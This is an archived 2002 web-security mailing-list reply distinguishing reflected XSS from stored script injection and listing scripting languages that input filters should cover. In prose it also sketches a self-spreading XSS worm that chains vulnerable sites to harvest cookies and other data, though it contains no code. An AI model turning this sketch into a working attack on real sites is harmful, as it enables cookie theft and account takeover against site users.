WebApp Sec mailing list archives
RE: Top Ten Web App Sec Problems
From: "b0iler _" <b0iler () hotmail com>
Date: Tue, 03 Dec 2002 19:52:46 -0700
Yep, there are a lot of interesting games that can be played with XSS. The sky is the limit. Here are some that I know about: grab people's email address who visit a Web site, create an email worm, order stuff from an eCommerce site, post fake news stories at Web sites, etc.
However, my feeling is that XSS bugs haven't been exploited in the wild. Instead people have just put together interesting demos. If anyone can point me to any press articles where XSS might have been used, that would be great.
Richard
I've exploited XSS holes many times. I have heard/seen people attempt XSS exploitation many times. It is a much more targeted and specific type of attack than one which the attack has full power to exploit, this may be a reason behind it's limited use. I'd say script injection attacks are more damaging, and exploited much more frequently than XSS.
Instead of that fake news story being up for 1 user, and only if that user is sent to the webapp with XSS payload, the fake story would be up for everyuser.
It is impossible to create an email worm with XSS, since the file is stored on the server it is a script injection type of attack. XSS works by input being echoed back to the user. Script injection is when this input is saved perminately to a file, database, etc and then presented to the user at a later time. This makes for a more perminate attack, one that is much more likely to work. One "worm" which would work would be a normal XSS worm that chains their urls together, perhaps querying a database for all of the urls to hit (or hardcode it in). This could spread from site to site gaining cookies, urls, and other important info. It could even spread from user to user if the XSS can send instant messages or force other users to visit html pages somehow (not via email, again, that is script injection).
On a related note, please remember that XSS/script injection is not just javascript. Other languages have their own benifits. If you are just filtering for javascript, best to add these other languages (or use a completely different system for input varification): ActiveX (OLE), VBscript (OpenScape), CSS, Shockwave, Flash, Actionscript, mocha (netscape's javascript command line interpreter), livescript (orignal name of javascript), Java, tcltk (http://dev.scriptics.com/software/plugin/), ACUCOBOL-GT (http://www.actis.gr/prod/acucobol/webplugin.htm), dolphin (smalltalk http://www.object-arts.com/Lib/EducationCentre4/htm/deployingfortheweb.htm), Applescript, tml (http://browsex.com), and others I am unaware of. If you know of any more please email them with url for more info on them.
_________________________________________________________________Help STOP SPAM with the new MSN 8 and get 2 months FREE* http://join.msn.com/?page=features/junkmail
Current thread:
- FW: Top Ten Web App Sec Problems, (continued)
- FW: Top Ten Web App Sec Problems Keith T. Morgan (Dec 02)
- Re: Top Ten Web App Sec Problems Steven M. Christey (Dec 02)
- RE: Top Ten Web App Sec Problems Richard M. Smith (Dec 02)
- Re: Top Ten Web App Sec Problems Kevin Spett (Dec 02)
- Re: Top Ten Web App Sec Problems Alex Lambert (Dec 02)
- Re: Top Ten Web App Sec Problems Marc Slemko (Dec 02)
- RE: Top Ten Web App Sec Problems Richard M. Smith (Dec 02)
- Re: Top Ten Web App Sec Problems Jeff Williams @ Aspect (Dec 02)
- RE: Top Ten Web App Sec Problems Craig, Scott (Dec 03)
- RE: Top Ten Web App Sec Problems Steven M. Christey (Dec 03)
- RE: Top Ten Web App Sec Problems Richard M. Smith (Dec 03)
- RE: Top Ten Web App Sec Problems b0iler _ (Dec 03)
- Re: Top Ten Web App Sec Problems Jeff Williams @ Aspect (Dec 04)
- Re: Top Ten Web App Sec Problems Steven M. Christey (Dec 04)